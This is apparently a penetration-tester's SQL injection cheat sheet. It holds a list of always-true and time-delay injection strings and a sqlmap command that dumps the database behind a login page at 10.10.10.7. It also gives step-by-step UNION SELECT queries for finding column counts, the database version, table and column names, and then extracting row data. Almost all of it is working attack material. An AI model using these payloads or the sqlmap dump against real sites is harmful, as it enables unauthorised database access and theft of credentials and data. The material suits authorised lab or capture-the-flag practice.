Test Strings
"
'or 1=1
"or 1=1
or 1=1--
'or 1=1--
"or 1=1--
or 1=1#
'or 1=1#
"or
1=1#
or 1=1/*
'or 1=1/*
"or 1=1/*
or 1=1;%00
'or 1=1;%00
"or 1=1;%00
'or'
'or
'or'–
'or–
or a=a
'or a=a
"or a=a
or a=a–
'or a=a —
"or a=a–
or 'a'='a'
'or 'a'='a'
"or 'a'='a'
')or('a'='a'
")”a”=”a”
')'a'='a
'or”='
1' or '1'='1
' or 'abc'='abc';--
' or ' '=' ';--
' or 1=1;--
If any of these allow you to create an always true statement, or produce an error, it's vulnerable.
Test via timing
sleep(10)
1' sleep(10) ;--
Exploit
The easy way out is if you can use sqlmap:
# Read help
sqlmap help
# Example
sudo sqlmap -u "http://10.10.10.7/checklogin.php" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump
Otherwise, hopefully you can see some output from the injection test... if so, the follow steps get you to the W.
Find number of columns
Inject union select NULL,NULL,...
with more NULL
statement until there is no error. The number of NULLs when there is no error, is the number of columns in the table.
Get Version or DBMS
Let n == Number of columns...
Inject union all select 1,2,n-1,@@version,n
Note: this may not be the vulnerable row! If this doesn't work, and you have an error it should disclose the vulnerable column. If not, guess and check,
Check database we're on
Inject union all select 1,2,n-1,database(),n
Note: this is DBMS dependant!
Get tables
Inject union select 1,2,n-1,group_concat(table_name),n from information_schema.tables%20 where table_schema=database()
Getting columns
Any table/row name you inject, needs to be converted to a char string, use waraxe's tool.
Inject union select 1,2,n-1,group_concat(column_name),n from information_schema.columns where table_name=CHAR(100,101,118,95,97,99,99,111,117,110,116,115)
Getting data
Inject union select 1,2,n-1,group_concat(<rowname>,0x3a,<another_row_name>),n from <table_name>